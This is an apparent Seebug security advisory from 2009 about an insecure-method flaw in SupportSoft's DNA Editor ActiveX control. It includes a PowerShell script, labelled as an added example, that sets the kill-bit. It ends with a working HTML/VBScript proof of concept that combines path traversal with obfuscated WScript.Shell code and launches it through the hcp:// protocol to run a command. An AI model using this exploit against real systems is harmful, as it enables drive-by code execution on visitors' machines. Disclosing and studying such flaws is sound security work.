SupportSoft DNA Editor Module ActiveX Control Insecure Function Call Vulnerability

2009-03-06T00:00:00
ID SSV:4881
Type seebug
Reporter Root
Modified 2009-03-06T00:00:00

Description

BUGTRAQ ID: 34004

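SupportSoft is a US vendor of real-time service management software.

The DNA Editor Module ActiveX control (dnaedit.dll, CLSID: {01110800-3E00-11D2-8470-0060089874ED}) shipped with SupportSoft products does not properly filter the parameters passed to methods such as Packagefiles(), SaveDna(), AddFile() and SetIdentity(). If a user is tricked into visiting a malicious web page that passes specially crafted parameters to these methods, the result can be denial of service, the download of malicious files to the user's system, or arbitrary code execution.

SupportSoft DNA Editor Module v6.9.2205

Workaround: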

  • Set the kill-bit for CLSID: {01110800-3E00-11D2-8470-0060089874ED}.
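
One way to apply and verify this kill-bit, as an added example that is not part of the original advisory. It assumes an elevated PowerShell session; the function names Test-KillBit and Set-KillBit are hypothetical, while the registry location and the 0x400 "Compatibility Flags" value are the standard Internet Explorer kill-bit mechanism.

```powershell
# Added example: set and verify the Internet Explorer kill-bit for the
# DNA Editor Module control. Run from an elevated prompt.
$Clsid   = '{01110800-3E00-11D2-8470-0060089874ED}'   # CLSID from this advisory
$KillBit = 0x400                                       # kill-bit in "Compatibility Flags"

# 64-bit Windows keeps a second copy of the key for 32-bit Internet Explorer
# under Wow6432Node; both views must carry the flag.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path $_ }

function Get-CompatFlags {
    param([string]$Key)
    if (-not (Test-Path $Key)) { return $null }
    $item = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Root, [string]$Clsid)
    $flags = Get-CompatFlags -Key (Join-Path $Root $Clsid)
    return ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    param([string]$Root, [string]$Clsid)
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # Preserve any other compatibility flags already present on the key.
    $flags = Get-CompatFlags -Key $key
    if ($null -eq $flags) { $flags = 0 }
    New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($flags -bor $KillBit) -Force | Out-Null
}

foreach ($root in $Roots) {
    if (-not (Test-KillBit -Root $root -Clsid $Clsid)) {
        Set-KillBit -Root $root -Clsid $Clsid
    }
    # Re-read the value so the report reflects what is actually in the registry.
    $state = if (Test-KillBit -Root $root -Clsid $Clsid) { 'SET' } else { 'NOT SET' }
    Write-Output ("{0}\{1}: kill-bit {2}" -f $root, $Clsid, $state)
}
```

The kill-bit only stops Internet Explorer and other hosts that honor it from instantiating the control; dnaedit.dll stays installed and registered.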

Vendor patch:

SupportSoft

The vendor has not yet provided a patch or upgrade. We recommend that users of this software check the vendor's home page regularly for the latest version:

http://www.supportsoft.com/

<HTML>
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code by a hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe through the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>